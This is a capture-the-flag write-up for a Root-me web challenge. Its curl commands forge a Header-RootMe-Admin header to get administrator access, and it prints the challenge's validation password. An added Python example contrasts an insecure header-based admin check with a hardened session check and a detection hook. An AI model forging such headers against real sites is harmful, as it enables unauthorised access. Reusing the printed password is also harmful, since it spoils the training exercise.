Root-me

HTTP headers

HTTP response give informations

The statement says “Get an administrator access to the webpage.” That seems pretty straightforward.

We’ll curl the challenge and dump the headers:

 curl -i http://challenge01.root-me.org/web-serveur/ch5/index.php
 
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 01:25:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Header-RootMe-Admin: none

....

There’s an odd field called Header-RootMe-Admin, and it’s set to none.

Let’s send a request with that field set to different values. After trying a few, admin is the value that we’re looking for.

 
   curl -H "Header-RootMe-Admin:admin" http://challenge01.root-me.org/web-serveur/ch5/index.php
   
...   
<html>
<p>Content is not the only part of an HTTP response!</p>
<p>You dit it ! You can validate the challenge with the password HeadersMayBeUseful</p></body>
</html>
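
The lesson for the server side is that a request header is client input and cannot carry an authorization decision. The following is an added example, not the challenge's own code (which the page does not show): it contrasts a check that trusts Header-RootMe-Admin with one that derives the role from server-side session state. The session store, the cookie name `session` and all function names are assumptions made for illustration.

```python
import secrets

SESSIONS = {}  # hypothetical server-side store: session token -> role

def create_session(role):
    """Issued by the server only after a successful login (login not shown)."""
    token = secrets.token_urlsafe(32)  # unguessable, never derived from user input
    SESSIONS[token] = role
    return token

def _normalize(headers):
    # HTTP header names are case-insensitive, so compare them lower-cased.
    return {name.lower(): value for name, value in headers.items()}

def is_admin_insecure(headers):
    """Weak pattern: the role is read from a header the client can set freely."""
    return _normalize(headers).get("header-rootme-admin") == "admin"

def session_token(headers):
    """Extract the assumed 'session' cookie from the Cookie request header."""
    for part in _normalize(headers).get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session" and value:
            return value
    return None

def is_admin(headers):
    """Hardened: the role comes from server-side state; the role header is ignored."""
    return SESSIONS.get(session_token(headers)) == "admin"

def carries_role_header(headers):
    """Detection hook: a header the server emits in responses showed up in a request."""
    return "header-rootme-admin" in _normalize(headers)

if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    forged = {"Header-RootMe-Admin": "admin"}
    genuine = {"Cookie": "session=" + create_session("admin")}
    for label, request in (("forged header", forged), ("real session", genuine)):
        print(label,
              "| insecure check:", is_admin_insecure(request),
              "| hardened check:", is_admin(request),
              "| flag for review:", carries_role_header(request))
```
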